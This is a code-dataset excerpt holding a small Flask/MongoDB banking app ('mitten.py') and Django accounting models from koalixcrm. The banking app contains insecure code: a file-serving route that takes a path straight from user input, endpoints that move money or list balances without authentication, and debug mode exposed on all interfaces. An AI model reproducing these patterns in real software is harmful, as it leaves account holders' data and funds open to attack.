"usage_type": "call"}, {"api_name": "datadog.statsd", "line_number": 94, "usage_type": "attribute"}, {"api_name": "ah_datadog.get_datadog_prefix", "line_number": 94, "usage_type": "call"}, {"api_name": "utils.ResourceException", "line_number": 95, "usage_type": "call"}, {"api_name": "ah_datadog.datadog_timed", "line_number": 77, "usage_type": "call"}, {"api_name": "flask_restplus.fields.Integer", "line_number": 75, "usage_type": "attribute"}, {"api_name": "flask_restplus.fields", "line_number": 75, "usage_type": "name"}, {"api_name": "flask_restplus.Resource", "line_number": 104, "usage_type": "name"}, {"api_name": "datadog.statsd.increment", "line_number": 108, "usage_type": "call"}, {"api_name": "datadog.statsd", "line_number": 108, "usage_type": "attribute"}, {"api_name": "ah_datadog.get_datadog_prefix", "line_number": 108, "usage_type": "call"}, {"api_name": "time.time", "line_number": 119, "usage_type": "call"}, {"api_name": "modeling.model.max_adjustment.MaxAdjustmentModel.MaxAdjustmentModel", "line_number": 120, "usage_type": "call"}, {"api_name": "modeling.misc.experiment.UserExperiment", "line_number": 125, "usage_type": "call"}, {"api_name": "time.time", "line_number": 128, "usage_type": "call"}, {"api_name": "time.time", "line_number": 138, "usage_type": "call"}, {"api_name": "time.time", "line_number": 139, "usage_type": "call"}, {"api_name": "time.time", "line_number": 141, "usage_type": "call"}, {"api_name": "time.time", "line_number": 142, "usage_type": "call"}, {"api_name": "datadog.statsd.increment", "line_number": 146, "usage_type": "call"}, {"api_name": "datadog.statsd", "line_number": 146, "usage_type": "attribute"}, {"api_name": "ah_datadog.get_datadog_prefix", "line_number": 146, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 185, "usage_type": "call"}, {"api_name": "datadog.statsd.increment", "line_number": 189, "usage_type": "call"}, {"api_name": "datadog.statsd", "line_number": 189, "usage_type": "attribute"}, {"api_name": "ah_datadog.get_datadog_prefix", "line_number": 189, "usage_type": "call"}, {"api_name": "utils.ResourceException", "line_number": 190, "usage_type": "call"}, {"api_name": "ah_datadog.datadog_timed", "line_number": 105, "usage_type": "call"}, {"api_name": "flask_restplus.fields.Integer", "line_number": 103, "usage_type": "attribute"}, {"api_name": "flask_restplus.fields", "line_number": 103, "usage_type": "name"}, {"api_name": "flask_restplus.Resource", "line_number": 195, "usage_type": "name"}, {"api_name": "datadog.statsd.increment", "line_number": 199, "usage_type": "call"}, {"api_name": "datadog.statsd", "line_number": 199, "usage_type": "attribute"}, {"api_name": "ah_datadog.get_datadog_prefix", "line_number": 199, "usage_type": "call"}, {"api_name": "modeling.model.newuser.NewUserRiskModel.NewUserRiskModel", "line_number": 210, "usage_type": "call"}, {"api_name": "modeling.misc.predictor.Predictor", "line_number": 212, "usage_type": "call"}, {"api_name": "datadog.statsd.increment", "line_number": 218, "usage_type": "call"}, {"api_name": "datadog.statsd", "line_number": 218, "usage_type": "attribute"}, {"api_name": "ah_datadog.get_datadog_prefix", "line_number": 218, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 234, "usage_type": "call"}, {"api_name": "datadog.statsd.increment", "line_number": 238, "usage_type": "call"}, {"api_name": "datadog.statsd", "line_number": 238, "usage_type": "attribute"}, {"api_name": "ah_datadog.get_datadog_prefix", "line_number": 238, "usage_type": "call"}, {"api_name": "utils.ResourceException", "line_number": 239, "usage_type": "call"}, {"api_name": "ah_datadog.datadog_timed", "line_number": 196, "usage_type": "call"}, {"api_name": "flask_restplus.fields.Integer", "line_number": 194, "usage_type": "attribute"}, {"api_name": "flask_restplus.fields", "line_number": 194, "usage_type": "name"}, {"api_name": "flask_restplus.Resource", "line_number": 246, "usage_type": "name"}, {"api_name": "datadog.statsd.increment", "line_number": 250, "usage_type": "call"}, {"api_name": "datadog.statsd", "line_number": 250, "usage_type": "attribute"}, {"api_name": "ah_datadog.get_datadog_prefix", "line_number": 250, "usage_type": "call"}, {"api_name": "modeling.model.restore.RestoreModel.RestoreModel", "line_number": 261, "usage_type": "call"}, {"api_name": "modeling.misc.predictor.Predictor", "line_number": 263, "usage_type": "call"}, {"api_name": "datadog.statsd.increment", "line_number": 269, "usage_type": "call"}, {"api_name": "datadog.statsd", "line_number": 269, "usage_type": "attribute"}, {"api_name": "ah_datadog.get_datadog_prefix", "line_number": 269, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 292, "usage_type": "call"}, {"api_name": "datadog.statsd.increment", "line_number": 296, "usage_type": "call"}, {"api_name": "datadog.statsd", "line_number": 296, "usage_type": "attribute"}, {"api_name": "ah_datadog.get_datadog_prefix", "line_number": 296, "usage_type": "call"}, {"api_name": "utils.ResourceException", "line_number": 297, "usage_type": "call"}, {"api_name": "ah_datadog.datadog_timed", "line_number": 247, "usage_type": "call"}, {"api_name": "flask_restplus.fields.Integer", "line_number": 245, "usage_type": "attribute"}, {"api_name": "flask_restplus.fields", "line_number": 245, "usage_type": "name"}, {"api_name": "modeling.misc.predictor.Predictor", "line_number": 303, "usage_type": "call"}, {"api_name": "ah_datadog.datadog_timed", "line_number": 300, "usage_type": "call"}, {"api_name": "modeling.misc.predictor.Predictor", "line_number": 310, "usage_type": "call"}, {"api_name": "ah_datadog.datadog_timed", "line_number": 307, "usage_type": "call"}, {"api_name": "flask.g.extras", "line_number": 316, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 316, "usage_type": "name"}, {"api_name": "utils.ResourceException", "line_number": 319, "usage_type": "call"}]} +{"seq_id": "510901758", "text": "from flask import Flask, request, Response, jsonify, redirect, render_template, session, send_file\nimport bcrypt\nfrom secrets import token_urlsafe\nimport requests\nfrom time import time\nimport json\nfrom pymongo import MongoClient\nclient = MongoClient('localhost', 27017)\ndb = client.mitten\nusers = db.users\n\napp = Flask(__name__)\n\nports = {\n 'B1' : 8081,\n 'B2' : 8082,\n 'B3' : 8083,\n}\n\n@app.route('/user', methods = ['POST'])\ndef create_user():\n email = request.form.get('email')\n password = request.form.get('password').encode()\n name = request.form.get('name')\n\n salt = bcrypt.gensalt()\n hashed = bcrypt.hashpw(password, salt)\n token = token_urlsafe(16) \n\n users.insert({\n 'email' : email,\n 'hashed' : hashed,\n 'name' : name,\n 'salt' : salt,\n 'token' : token,\n })\n\n return 'ok'\n\n@app.route('/getuser', methods = ['POST'])\n@app.route('/user', methods = ['GET'])\ndef get_user():\n print(request)\n email = request.form.get('email')\n password = request.form.get('password').encode()\n\n user = users.find_one({'email' : email})\n\n salt = user['salt']\n hashed = bcrypt.hashpw(password, salt)\n\n if user['hashed'] == hashed:\n return jsonify({'token' : user['token'],\n 'name' : user['name'],\n }) \n else:\n return '0'\n\n@app.route('/getaccounts', methods = ['POST'])\n@app.route('/accounts', methods = ['GET'])\ndef accounts():\n # email = request.form.get('email')\n # token = request.form.get('token')\n\n user = users.find_one({'name' : 'Luca'})\n\n # if user['token'] == token:\n print(user['accounts'])\n if 'accounts' in user:\n for account in user['accounts']:\n print(account['accountID'])\n r = requests.get('http://34.89.193.58:' + str(ports[account['accountID'][:2]]) + '/balance',\n data = {'accountID' : account['accountID'],\n\n })\n account['balance'] = json.loads(r.content.decode())['balance']\n \n sd = user['accounts'][1:]\n ret = '

Luca\\'s accounts:


Account ' + sd[0]['accountID'] + ': ' + str(sd[0]['balance']) + ' ' + sd[0]['currency'] + '


' + \\\n '

Account ' + sd[1]['accountID'] + ': ' + str(sd[1]['balance']) + ' ' + sd[1]['currency'] + '

'\n\n return ret\n else:\n return jsonify([])\n # else:\n # return '0'\n\n@app.route('/transaction', methods = ['POST'])\ndef transaction():\n email = request.form.get('email')\n ammount = request.form.get('ammount')\n token = request.form.get('token')\n accountID = request.form.get('accountID')\n accountIDdest = request.form.get('accountIDdest')\n currency = request.form.get('currency')\n ttype = request.form.get('type')\n timestamp = time()\n\n print(email)\n user = users.find_one({'email' : email})\n\n print(user)\n\n if user['token'] == token:\n r = requests.post('http://34.89.193.58:' + str(ports[accountIDdest[:2]]) + '/transaction',\n data = {'accountID' : accountID,\n 'accountIDdest' : accountIDdest,\n 'ammount' : ammount,\n })\n\n print(r.content)\n if r.content.decode() == 'no money':\n return '0'\n\n\n users.update({'email' : email},\n {'$push' : {'transactions' : {\n 'accountID' : accountID,\n 'currency' : currency,\n 'accountIDdest' : accountIDdest,\n 'type' : ttype,\n 'timestamp' : timestamp,\n 'ammount' : -float(ammount),\n }}})\n\n return 'ok'\n else:\n return '0'\n\n@app.route('/account', methods = ['POST'])\ndef account():\n email = request.form.get('email')\n token = request.form.get('token')\n accountID = request.form.get('accountID')\n currency = request.form.get('currency')\n\n user = users.find_one({'email' : email})\n\n if user['token'] == token:\n users.update({'email' : email},\n {'$push' : {'accounts' : {\n 'accountID' : accountID,\n 'currency' : currency,\n }}})\n\n return 'ok'\n else:\n return '0'\n\n@app.route('/card', methods = ['POST'])\ndef card():\n uid = request.form.get('uid')\n ammount = request.form.get('ammount')\n currency = request.form.get('currency')\n accountIDdest = request.form.get('accountIDdest')\n ttype = request.form.get('type')\n\n user = users.find_one({'card' : uid})\n\n print(user)\n\n token = user['token']\n\n print(token)\n\n for account in user['accounts']:\n print(account)\n if account['currency'] == currency:\n r = requests.post('http://34.89.193.58:8080/transaction',\n data = {'accountIDdest' : accountIDdest,\n 'accountID' : account['accountID'],\n 'ammount' : ammount,\n 'email' : user['email'],\n 'token' : token,\n 'type' : ttype,\n 'currency' : currency,\n })\n\n print(r.content.decode())\n if r.content.decode() == '0':\n return 'Transaction failed'\n\n return 'Transaction succesfull'\n return 'Transaction failed'\n\n@app.route('/img', methods = ['GET'])\n@app.route('/getimg', methods = ['POST'])\ndef img():\n return send_file(request.form.get('user') + '.png')\n\nif __name__ == '__main__':\n app.run(port = 8080,\n host = '0.0.0.0',\n debug = True,\n )\n", "sub_path": "mitten.py", "file_name": "mitten.py", "file_ext": "py", "file_size_in_byte": 5980, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pymongo.MongoClient", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 22, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 22, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 23, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 23, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 24, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 24, "usage_type": "name"}, {"api_name": "bcrypt.gensalt", "line_number": 26, "usage_type": "call"}, {"api_name": "bcrypt.hashpw", "line_number": 27, "usage_type": "call"}, {"api_name": "secrets.token_urlsafe", "line_number": 28, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 43, "usage_type": "argument"}, {"api_name": "flask.request.form.get", "line_number": 44, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 44, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 44, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 45, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 45, "usage_type": "name"}, {"api_name": "bcrypt.hashpw", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 53, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 72, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 90, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 90, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 90, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 91, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 91, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 91, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 92, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 92, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 92, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 93, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 93, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 93, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 94, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 94, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 94, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 95, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 95, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 95, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 96, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 96, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 96, "usage_type": "name"}, {"api_name": "time.time", "line_number": 97, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 105, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 132, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 132, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 132, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 133, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 133, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 133, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 134, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 134, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 134, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 135, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 135, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 135, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 152, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 152, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 152, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 153, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 153, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 153, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 154, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 154, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 154, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 155, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 155, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 155, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 156, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 156, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 156, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 169, "usage_type": "call"}, {"api_name": "flask.send_file", "line_number": 189, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 189, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 189, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 189, "usage_type": "name"}]} +{"seq_id": "576384937", "text": "# -*- coding: utf-8 -*-\n\nimport os\nfrom datetime import *\nfrom subprocess import check_output\nfrom subprocess import STDOUT\nfrom xml.dom.minidom import Document\n\nfrom django.conf import settings\nfrom django.core import serializers\nfrom django.db import models\nfrom django.utils.translation import ugettext as _\nfrom koalixcrm import djangoUserExtension\nfrom koalixcrm.crm.exceptions import UserExtensionMissing\nfrom koalixcrm.accounting.const.accountTypeChoices import *\nfrom koalixcrm.accounting.exceptions import NoObjectsToBeSerialzed\nfrom koalixcrm.accounting.exceptions import ProgrammingError\n\n\nclass AccountingPeriod(models.Model):\n \"\"\"Accounting period repesents the equivalent of the business logic element of a fiscal year\n the accounting period is refered in the booking and is used as a supporting object to generate\n balance sheets and profit/loss statements\"\"\"\n title = models.CharField(max_length=200, verbose_name=_(\"Title\")) # For example \"Year 2009\", \"1st Quarter 2009\"\n begin = models.DateField(verbose_name=_(\"Begin\"))\n end = models.DateField(verbose_name=_(\"End\"))\n\n @staticmethod\n def getCurrentValidAccountingPeriod():\n \"\"\"Returns the accounting period that is currently valid. Valid is an accountingPeriod when the current date\n lies between begin and end of the accountingPeriod\n\n Args:\n no arguments\n\n Returns:\n accoutingPeriod (AccoutingPeriod)\n\n Raises:\n NoFeasableAccountingPeriodFound when there is no valid accounting Period\"\"\"\n currentValidAccountingPeriod = None\n for accountingPeriod in AccountingPeriod.objects.all():\n if accountingPeriod.begin < date.today() and accountingPeriod.end > date.today():\n return accountingPeriod\n if currentValidAccountingPeriod == None:\n raise NoFeasableAccountingPeriodFound()\n\n @staticmethod\n def getAllPriorAccountingPeriods(targetAccountingPeriod):\n \"\"\"Returns the accounting period that is currently valid. Valid is an accountingPeriod when the current date\n lies between begin and end of the accountingPeriod\n\n Args:\n no arguments\n\n Returns:\n accoutingPeriods (List of AccoutingPeriod)\n\n Raises:\n NoPriorAccountingPeriodFound when there is no valid accounting Period\"\"\"\n currentValidAccountingPeriod = None\n accountingPeriods = []\n for accountingPeriod in AccountingPeriod.objects.all():\n if accountingPeriod.end < targetAccountingPeriod.begin:\n accountingPeriods.append(accountingPeriod)\n if accountingPeriods == []:\n raise NoPriorAccountingPeriodFound()\n return accountingPeriods\n\n @staticmethod\n def createXML(whatToCreate):\n \"\"\"This method serialize requestd objects into a XML file which is located in the PDF_OUTPUT_ROOT folder.\n\n Args:\n whatToCreate (str): Which objects that have to be serialized\n\n Returns:\n path_full to the location of the file\n\n Raises:\n ProgrammingError will be raised when incorrect objects to be serialized was selected\n NoObjectToBeSerialized will be raised when no object can be serialized\"\"\"\n\n XMLSerializer = serializers.get_serializer(\"xml\")\n xml_serializer = XMLSerializer()\n if whatToCreate == \"allAccount\":\n path_fullToOutputFile = os.path.join(settings.PDF_OUTPUT_ROOT, \"accounts.xml\")\n objectsToSerialize = Account.objects.all()\n else:\n raise ProgrammingError(\n _(\"During XML Export it was not correctly specified which data that has to be exported\"))\n out = open(os.path.join(settings.PDF_OUTPUT_ROOT, \"accounts.xml\"), \"w\")\n if objectsToSerialize == '':\n raise NoObjectsToBeSerialzed(_(\"During XML Export it was not correctly specied data has to be exported\"))\n else:\n xml_serializer.serialize(objectsToSerialize, stream=out, indent=3)\n out.close()\n return path_fullToOutputFile\n\n # TODO def importAllAccountsXML(self):\n\n def createPDF(self, raisedbyuser, whatToCreate):\n userExtension = djangoUserExtension.models.UserExtension.objects.filter(user=raisedbyuser.id)\n if (len(userExtension) == 0):\n raise UserExtensionMissing(_(\"During BalanceSheet PDF Export\"))\n doc = Document()\n if whatToCreate == \"balanceSheet\":\n main = doc.createElement(\"koalixaccountingbalacesheet\")\n out = open(os.path.join(settings.PDF_OUTPUT_ROOT, \"balancesheet_\" + str(self.id) + \".xml\"), \"wb\")\n else:\n main = doc.createElement(\"koalixaccountingprofitlossstatement\")\n out = open(os.path.join(settings.PDF_OUTPUT_ROOT, \"profitlossstatement_\" + str(self.id) + \".xml\"), \"wb\")\n accountingPeriodName = doc.createElement(\"accountingPeriodName\")\n accountingPeriodName.appendChild(doc.createTextNode(self.__str__()))\n main.appendChild(accountingPeriodName)\n organisiationname = doc.createElement(\"organisiationname\")\n organisiationname.appendChild(doc.createTextNode(userExtension[0].defaultTemplateSet.organisationname))\n main.appendChild(organisiationname)\n accountingPeriodTo = doc.createElement(\"accountingPeriodTo\")\n accountingPeriodTo.appendChild(doc.createTextNode(self.end.year.__str__()))\n main.appendChild(accountingPeriodTo)\n accountingPeriodFrom = doc.createElement(\"accountingPeriodFrom\")\n accountingPeriodFrom.appendChild(doc.createTextNode(self.begin.year.__str__()))\n main.appendChild(accountingPeriodFrom)\n headerPicture = doc.createElement(\"headerpicture\")\n headerPicture.appendChild(doc.createTextNode(userExtension[0].defaultTemplateSet.logo.path_full))\n main.appendChild(headerPicture)\n accounts = Account.objects.all()\n overallValueBalance = 0\n overallValueProfitLoss = 0\n for account in list(accounts):\n withinAccountingPeriod = account.sumOfAllBookingsWithinAccountingPeriod(self)\n beforeAccountingPeriod = account.sumOfAllBookingsBeforeAccountingPeriod(self)\n currentValue = withinAccountingPeriod + beforeAccountingPeriod\n if (currentValue != 0):\n currentAccountElement = doc.createElement(\"Account\")\n accountNumber = doc.createElement(\"AccountNumber\")\n accountNumber.appendChild(doc.createTextNode(account.accountNumber.__str__()))\n beforeAccountingPeriodAccountElement = doc.createElement(\"beforeAccountingPeriod\")\n beforeAccountingPeriodAccountElement.appendChild(doc.createTextNode(beforeAccountingPeriod.__str__()))\n currentValueElement = doc.createElement(\"currentValue\")\n currentValueElement.appendChild(doc.createTextNode(currentValue.__str__()))\n accountNameElement = doc.createElement(\"accountName\")\n accountNameElement.appendChild(doc.createTextNode(account.title))\n currentAccountElement.setAttribute(\"accountType\", account.accountType.__str__())\n currentAccountElement.appendChild(accountNumber)\n currentAccountElement.appendChild(accountNameElement)\n currentAccountElement.appendChild(currentValueElement)\n currentAccountElement.appendChild(beforeAccountingPeriodAccountElement)\n main.appendChild(currentAccountElement)\n if account.accountType == \"A\":\n overallValueBalance = overallValueBalance + currentValue;\n if account.accountType == \"L\":\n overallValueBalance = overallValueBalance - currentValue;\n if account.accountType == \"E\":\n overallValueProfitLoss = overallValueProfitLoss + currentValue;\n if account.accountType == \"S\":\n overallValueProfitLoss = overallValueProfitLoss - currentValue;\n totalProfitLoss = doc.createElement(\"TotalProfitLoss\")\n totalProfitLoss.appendChild(doc.createTextNode(overallValueProfitLoss.__str__()))\n main.appendChild(totalProfitLoss)\n totalBalance = doc.createElement(\"TotalBalance\")\n totalBalance.appendChild(doc.createTextNode(overallValueBalance.__str__()))\n main.appendChild(totalBalance)\n doc.appendChild(main)\n out.write(doc.toprettyxml(indent=\" \", newl=\"\\n\", encoding=\"utf-8\"))\n out.close()\n if whatToCreate == \"balanceSheet\":\n check_output(\n [settings.FOP_EXECUTABLE, '-c', userExtension[0].defaultTemplateSet.fopConfigurationFile.path_full, '-xml',\n os.path.join(settings.PDF_OUTPUT_ROOT, 'balancesheet_' + str(self.id) + '.xml'), '-xsl',\n userExtension[0].defaultTemplateSet.balancesheetXSLFile.xslfile.path_full, '-pdf',\n os.path.join(settings.PDF_OUTPUT_ROOT, 'balancesheet_' + str(self.id) + '.pdf')], stderr=STDOUT)\n return os.path.join(settings.PDF_OUTPUT_ROOT, \"balancesheet_\" + str(self.id) + \".pdf\")\n else:\n check_output(\n [settings.FOP_EXECUTABLE, '-c', userExtension[0].defaultTemplateSet.fopConfigurationFile.path_full, '-xml',\n os.path.join(settings.PDF_OUTPUT_ROOT, 'profitlossstatement_' + str(self.id) + '.xml'), '-xsl',\n userExtension[0].defaultTemplateSet.profitLossStatementXSLFile.xslfile.path_full, '-pdf',\n os.path.join(settings.PDF_OUTPUT_ROOT, 'profitlossstatement_' + str(self.id) + '.pdf')], stderr=STDOUT)\n return os.path.join(settings.PDF_OUTPUT_ROOT, \"profitlossstatement_\" + str(self.id) + \".pdf\")\n\n def __str__(self):\n return self.title\n\n # TODO: def createNewAccountingPeriod() Neues Geschäftsjahr erstellen\n\n class Meta:\n app_label = \"accounting\"\n verbose_name = _('Accounting Period')\n verbose_name_plural = _('Accounting Periods')\n\n\nclass Account(models.Model):\n accountNumber = models.IntegerField(verbose_name=_(\"Account Number\"))\n title = models.CharField(verbose_name=_(\"Account Title\"), max_length=50)\n accountType = models.CharField(verbose_name=_(\"Account Type\"), max_length=1, choices=ACCOUNTTYPECHOICES)\n description = models.TextField(verbose_name=_(\"Description\"), null=True, blank=True)\n isopenreliabilitiesaccount = models.BooleanField(verbose_name=_(\"Is The Open Liabilities Account\"))\n isopeninterestaccount = models.BooleanField(verbose_name=_(\"Is The Open Interests Account\"))\n isProductInventoryActiva = models.BooleanField(verbose_name=_(\"Is a Product Inventory Account\"))\n isACustomerPaymentAccount = models.BooleanField(verbose_name=_(\"Is a Customer Payment Account\"))\n\n def sumOfAllBookings(self):\n calculated_sum = self.allBookings(fromAccount=False) - self.allBookings(fromAccount=True)\n if self.accountType == 'S' or self.accountType == 'L':\n calculated_sum = 0 - calculated_sum\n return calculated_sum\n\n sumOfAllBookings.short_description = _(\"Value\");\n\n def sumOfAllBookingsWithinAccountingPeriod(self, accountingPeriod):\n calculated_sum = self.allBookingsInAccountingPeriod(fromAccount=False,\n accountingPeriod=accountingPeriod) - self.allBookingsInAccountingPeriod(\n fromAccount=True, accountingPeriod=accountingPeriod)\n if self.accountType == 'S' or self.accountType == 'L':\n calculated_sum = 0 - calculated_sum\n return calculated_sum\n\n def sumOfAllBookingsBeforeAccountingPeriod(self, currentAccountingPeriod):\n accountingPeriods = AccountingPeriod.getAllPriorAccountingPeriods(currentAccountingPeriod)\n sum = 0\n for accountingPeriod in accountingPeriods:\n sum = sum + self.allBookingsInAccountingPeriod(fromAccount=False,\n accountingPeriod=accountingPeriod) - self.allBookingsInAccountingPeriod(\n fromAccount=True, accountingPeriod=accountingPeriod)\n if self.accountType == 'S' or self.accountType == 'L':\n sum = 0 - sum\n return sum\n\n def allBookings(self, fromAccount):\n sum = 0\n if fromAccount == True:\n bookings = Booking.objects.filter(fromAccount=self.id)\n else:\n bookings = Booking.objects.filter(toAccount=self.id)\n\n for booking in list(bookings):\n sum = sum + booking.amount\n\n return sum\n\n def allBookingsInAccountingPeriod(self, fromAccount, accountingPeriod):\n sum = 0\n if (fromAccount == True):\n bookings = Booking.objects.filter(fromAccount=self.id, accountingPeriod=accountingPeriod.id)\n else:\n bookings = Booking.objects.filter(toAccount=self.id, accountingPeriod=accountingPeriod.id)\n\n for booking in list(bookings):\n sum = sum + booking.amount\n\n return sum\n\n def __str__(self):\n return self.accountNumber.__str__() + \" \" + self.title\n\n class Meta:\n app_label = \"accounting\"\n verbose_name = _('Account')\n verbose_name_plural = _('Account')\n ordering = ['accountNumber']\n\n\nclass ProductCategorie(models.Model):\n title = models.CharField(verbose_name=_(\"Product Categorie Title\"), max_length=50)\n profitAccount = models.ForeignKey(Account, verbose_name=_(\"Profit Account\"), limit_choices_to={\"accountType\": \"E\"},\n related_name=\"db_profit_account\")\n lossAccount = models.ForeignKey(Account, verbose_name=_(\"Loss Account\"), limit_choices_to={\"accountType\": \"S\"},\n related_name=\"db_loss_account\")\n\n class Meta:\n app_label = \"accounting\"\n verbose_name = _('Product Categorie')\n verbose_name_plural = _('Product Categories')\n\n def __str__(self):\n return self.title\n\n\nclass Booking(models.Model):\n fromAccount = models.ForeignKey(Account, verbose_name=_(\"From Account\"), related_name=\"db_booking_fromaccount\")\n toAccount = models.ForeignKey(Account, verbose_name=_(\"To Account\"), related_name=\"db_booking_toaccount\")\n amount = models.DecimalField(max_digits=20, decimal_places=2, verbose_name=_(\"Amount\"))\n description = models.CharField(verbose_name=_(\"Description\"), max_length=120, null=True, blank=True)\n bookingReference = models.ForeignKey('crm.Invoice', verbose_name=_(\"Booking Reference\"), null=True, blank=True)\n bookingDate = models.DateTimeField(verbose_name=_(\"Booking at\"))\n accountingPeriod = models.ForeignKey(AccountingPeriod, verbose_name=_(\"AccountingPeriod\"))\n staff = models.ForeignKey('auth.User', limit_choices_to={'is_staff': True}, blank=True,\n verbose_name=_(\"Reference Staff\"), related_name=\"db_booking_refstaff\")\n dateofcreation = models.DateTimeField(verbose_name=_(\"Created at\"), auto_now=True)\n lastmodification = models.DateTimeField(verbose_name=_(\"Last modified\"), auto_now_add=True)\n lastmodifiedby = models.ForeignKey('auth.User', limit_choices_to={'is_staff': True}, blank=True,\n verbose_name=_(\"Last modified by\"), related_name=\"db_booking_lstmodified\")\n\n def bookingDateOnly(self):\n return self.bookingDate.date()\n\n bookingDateOnly.short_description = _(\"Date\");\n\n def __str__(self):\n return self.fromAccount.__str__() + \" \" + self.toAccount.__str__() + \" \" + self.amount.__str__()\n\n class Meta:\n app_label = \"accounting\"\n verbose_name = _('Booking')\n verbose_name_plural = _('Bookings')\n", "sub_path": "koalixcrm/accounting/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 15735, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.db.models.Model", "line_number": 20, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 24, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 24, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 24, "usage_type": "call"}, {"api_name": "django.db.models.DateField", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 25, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.models.DateField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 26, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 26, "usage_type": "call"}, {"api_name": "django.core.serializers.get_serializer", "line_number": 84, "usage_type": "call"}, {"api_name": "django.core.serializers", "line_number": 84, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "django.conf.settings.PDF_OUTPUT_ROOT", "line_number": 87, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 87, "usage_type": "name"}, {"api_name": "koalixcrm.accounting.exceptions.ProgrammingError", "line_number": 90, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext", "line_number": 91, "usage_type": 